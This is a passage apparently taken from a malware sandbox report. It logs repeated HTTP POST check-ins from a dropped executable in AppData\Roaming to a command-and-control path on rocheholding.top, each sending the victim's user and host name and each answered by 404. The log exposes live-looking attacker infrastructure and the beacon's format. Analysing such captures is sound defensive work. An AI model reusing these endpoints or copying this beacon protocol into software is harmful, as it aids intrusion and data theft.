                      May 23, 2024 20:18:00.788536072 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:18:01.358052015 CEST629INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:18:01 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=daUwx8HMk1pfRE8aVWTKyGpQOJRQCZmOiRTfFhZ3phJT80nOx0pNWMmk9s%2Fkt%2BFC92N3Fcqzlamb1eyt%2FBw207p%2FuC3EkbVXgm%2FPejZKaF25TjiVuLz1uDQYEBH%2F1jxW4QNj"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870bcd3c7f7c9c-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      24192.168.2.2249188188.114.96.3803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:18:01.557933092 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:18:01.607893944 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:18:02.216253996 CEST629INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:18:02 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O57ZIRniiINk2qn8yVpk4zNrNDOxLwILjgnk2nfcdKwetwWREc%2F3LjjhJ3zFFjfnyCiluAxXMRoG3H%2B9r%2Bh3qydlBKHwSJ06sLQB3oTOyCd%2FR9%2BRRGeC%2FXLRXxqtN7pGyGqw"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870bd25e7b4240-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      25192.168.2.2249189188.114.96.3803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:18:02.368807077 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:18:02.423894882 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:18:03.109268904 CEST629INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:18:03 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ivBvZw8kN5NoHh6PB%2FlCS6hRsGq3H88xBDGx4CZ%2B%2FgldmfFElQXgryjY3OICUSAFB6ZtlptxQsgfgiKbyL9UVJecpEEF%2BA4qQdaMIYJvFcnUokQUfd37Z7Pxgt3I%2B%2FKSYYMS"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870bd77a3f42af-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      26192.168.2.2249190188.114.96.3803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:18:03.278749943 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:18:03.339329004 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:18:04.014142990 CEST625INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:18:03 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vAxvFtv%2BY%2BgMFZP%2BCifw8mJ4NxXYcoi8lsm4UlXu20wUYRHqkxJenAggqFNaFgW6h2uQ6zkMtGPKNSFoXWyPoBB1wCmuqp%2BrU8JYjMDBQLKxr8TZqdb44hmYt6w0GIDPO9lo"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870bdd1d1cc472-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      27192.168.2.2249191188.114.96.3803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:18:04.176230907 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:18:04.232033014 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:18:05.011420012 CEST629INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:18:04 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BswJSZb%2F%2BsnEOBGmgrIWTkOMCQZR64fnncoBJySwXAt8DE%2BhHHt0Rsvn%2FTpMbhA3ccEzhyQnBKzvcVTXdRI7HdtqBKJTQkHZANnHEOIOfDbd3WKXOuLN5B2OtkfZ%2BOMWzNGc"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870be33d9a42be-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      28192.168.2.2249192188.114.97.3803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:18:06.045591116 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:18:06.103692055 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:18:06.911864042 CEST623INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:18:06 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X%2FtPiQGlrZeEZCC2Ick6y%2F9n1nQg53RLoFhz9ji2GGrKTd%2FjYy2hs58F7q9s1daufuJK04paakMsN6z1V5ZjQhwL0YVPTtQTDgdv1Ji2Dy0xA29mxrm3m2lDl3QySjYFOSgp"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870bef2b040f5d-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      29192.168.2.2249193188.114.97.3803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:18:07.107765913 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:18:07.135699987 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:18:07.833966970 CEST625INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:18:07 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s2j3uyAnduO1LV3k6OKq%2FlpMUPhNGvzz1nNAzWydPoMxf8AivjNL6S1aqUVw8te01ACmTteztf3F%2FKnbGRzhkAuLBNiBRw4I8ri%2BZ27v040YBGmVt15c%2FF6BssEC4wBuDeoA"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870bf51ab30f6b-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      30192.168.2.2249194188.114.96.3803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:18:07.989686012 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:18:08.039657116 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:18:08.765249968 CEST625INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:18:08 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WRvZePXFPlkxEJVwKTTTijkbOB%2B333hVqmUBK2qYyKq0OVebdHBfoEq%2Fl9IrPi0KEl0O3sOXq12k0XNyVERdv1dLIgK%2Fz6T3GxVw%2Fh2W4noTQY6JTzMTRcZAw0cNo3ARZlC3"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870bfabe478c36-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      31192.168.2.2249195188.114.96.3803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:18:08.948107004 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:18:09.004693985 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:18:09.690977097 CEST631INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:18:09 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rCEc%2FXVV0IoR5q20CC69i4UiC%2F4Nft2%2BljiEksV%2FQj0Ippy3Mi8Ic11V7nFgywaXKnOmJosJQ3PXZryQs0rKgkKmD2X%2FgKxNZmBrunIi%2BD2U6HJ%2BqDJpAZsA6ZZxG7vPDLfd"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870c009e118cba-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      32192.168.2.2249196188.114.97.3803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:18:09.860809088 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:18:09.911942959 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:18:10.520375967 CEST621INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:18:10 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hxKyChiHMDmb9YOgd4NX3IhzMauq8%2FGW90eeKt4NH0NJtg6NA7F0wCE8HrdSWYJrtAs7w2aTrW%2FnRhJcqP2xR54L50w4tNEdwgLkoAhEMj4fHmmnLAfUFfJDwIY6n4vn8EiW"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870c066e3e8c42-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      33192.168.2.2249197188.114.96.3803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:18:10.679780960 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:18:10.732007027 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:18:11.463794947 CEST627INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:18:11 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1YrzDTgbGTFNsJlybcqt3XkkIVlLK14HrW2WTCNv%2BdBCNhIakpaXbvoMdTr43r%2FAC8YwbIbPMRHoyqgWoMrIMlnTe7xK7i12pqSE10V%2FSP4%2FF%2BlLdXC95j94fQA9wXJ20ytj"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870c0baa0a7cb1-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      34192.168.2.2249198188.114.96.3803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:18:11.714251041 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:18:11.765513897 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:18:12.461520910 CEST629INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:18:12 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nKEiPLJ%2FfYyZHRid%2BQFyaZ8gA150%2Bf7lDduR2eFQqc3PvjL0MsrPGjAOHmB%2FQemnzdD0X1crX34ZWAOmHgoxpPP9ll5XC4I15umm%2BaY%2BqU3gp3kYCr0gFOllxolxLq3WNAtQ"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870c11fd177295-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      35192.168.2.2249199188.114.96.3803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:18:16.270962000 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:18:16.327889919 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:18:17.009301901 CEST623INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:18:16 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DUemUkIusQoe2F3TNbZk748Wn%2Fw%2F5bSpQoUyJrLtdWvbBP7CMBPGtcXKLMxSSxMYmPf%2BO21IhF8q8FV9lfCH9MUj5yDtcJ2zcWKgINEPGR3wLEsPVIN4fumhyvqSwcKtXVxE"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870c2e4bc74213-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      36192.168.2.2249200188.114.96.3803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:18:17.156368017 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:18:17.221688032 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:18:17.923675060 CEST623INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:18:17 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YDutgQFFIxzNIKBvrlLi6JAd63W8y6IU71RakIQQh6%2F57n178FzVpHDbdIKj95tsqyTol2DABdh8dK2And2oKWtLXqnEIHWndFZT9RVezUx4kiOw7pGwJdj1q%2BQx6anp%2FY1P"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870c33e907425f-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      37192.168.2.2249201188.114.97.3803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:18:18.079750061 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:18:18.131640911 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:18:18.808876038 CEST621INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:18:18 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
